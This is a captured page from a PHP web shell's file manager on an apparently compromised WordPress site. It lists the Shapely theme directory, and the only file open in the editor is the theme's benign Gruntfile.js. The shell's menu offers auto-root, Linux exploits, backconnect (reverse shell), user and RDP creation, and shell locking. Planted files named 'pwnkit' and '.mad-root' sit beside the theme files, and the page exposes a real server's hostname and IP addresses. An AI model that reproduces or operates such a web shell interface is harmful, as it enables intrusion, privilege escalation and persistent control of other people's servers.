Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
shapely /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
845
B
-rw-r--r--
Gruntfile.js
3.73
KB
-rw-r--r--
README.md
1.97
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-jetpack-portfolio.php
2.53
KB
-rw-r--r--
archive.php
1.2
KB
-rw-r--r--
attachment.php
920
B
-rw-r--r--
changelog.txt
5.34
KB
-rw-r--r--
comments.php
3.1
KB
-rw-r--r--
footer.php
1.12
KB
-rw-r--r--
functions.php
9.4
KB
-rw-r--r--
header.php
3.17
KB
-rw-r--r--
index.php
1.32
KB
-rw-r--r--
package.json
550
B
-rw-r--r--
page.php
1.16
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
5.13
KB
-rw-r--r--
rtl.css
367
B
-rw-r--r--
screenshot.png
1.04
MB
-rw-r--r--
search.php
1.43
KB
-rw-r--r--
sidebar-footer.php
1.32
KB
-rw-r--r--
sidebar.php
420
B
-rw-r--r--
single-jetpack-portfolio.php
1
KB
-rw-r--r--
single.php
906
B
-rw-r--r--
style.css
90.97
KB
-rw-r--r--
woocommerce.php
331
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Gruntfile.js
'use strict'; module.exports = function (grunt) { // load all tasks require('load-grunt-tasks')(grunt, { scope: 'devDependencies' }); grunt.config.init({ pkg: grunt.file.readJSON('package.json'), dirs: { css: 'assets/css', js: 'assets/js' }, makepot: { target: { options: { domainPath: '/languages/', potFilename: '<%= pkg.name %>.pot', potHeaders: { poedit: true, 'x-poedit-keywordslist': true }, processPot: function (pot, options) { pot.headers['report-msgid-bugs-to'] = 'https://www.colorlib.com/'; pot.headers['language-team'] = 'Colorlib <office@colorlib.com>'; pot.headers['last-translator'] = 'Colorlib <office@colorlib.com>'; pot.headers['language-team'] = 'Colorlib <office@colorlib.com>'; return pot; }, updateTimestamp: true, type: 'wp-theme' } } }, addtextdomain: { target: { options: { updateDomains: true, textdomain: '<%= pkg.name %>' }, files: { src: [ '*.php', '!node_modules/**' ] } } }, checktextdomain: { standard: { options: { text_domain: ['shapely', 'epsilon-framework'], //Specify allowed domain(s) create_report_file: 'true', keywords: [ //List keyword specifications '__:1,2d', '_e:1,2d', '_x:1,2c,3d', 'esc_html__:1,2d', 'esc_html_e:1,2d', 'esc_html_x:1,2c,3d', 'esc_attr__:1,2d', 'esc_attr_e:1,2d', 'esc_attr_x:1,2c,3d', '_ex:1,2c,3d', '_n:1,2,4d', '_nx:1,2,4c,5d', '_n_noop:1,2,3d', '_nx_noop:1,2,3c,4d' ] }, files: [ { src: [ '**/*.php', '!**/node_modules/**', ], //all php expand: true }] } }, clean: { init: { src: ['build/'] }, build: { src: [ 'build/*', '!build/<%= pkg.name %>.zip' ] }, }, copy: { build: { expand: true, src: [ '**', '!node_modules/**', '!build/**', '!readme.md', '!README.md', '!phpcs.ruleset.xml', '!Gruntfile.js', '!package.json', '!set_tags.sh', '!shapely.zip', '!.gitignore', '!.jshintrc', '!.gitmodules', '!.travis.yml', '!jscsrc', '!.standard.json', '!package-lock.json', '!nbproject/**'], dest: 'build/' } }, compress: { build: { options: { pretty: true, archive: '<%= pkg.name %>.zip' }, expand: true, cwd: 'build/', src: ['**/*'], dest: '<%= pkg.name %>/' } }, imagemin: { jpg: { options: { progressive: true } }, png: { options: { optimizationLevel: 7 } }, dynamic: { files: [ { expand: true, cwd: 'assets/img/', src: ['**/*.{png,jpg,gif}'], dest: 'assets/img/' }] } }, }); // Check Missing Text Domain Strings grunt.registerTask('textdomain', [ 'checktextdomain' ]); // Minify Images grunt.registerTask('minimg', [ 'imagemin:dynamic' ]); // Build task grunt.registerTask('build-archive', [ 'clean:init', 'copy', 'compress:build', 'clean:init' ]); };
Close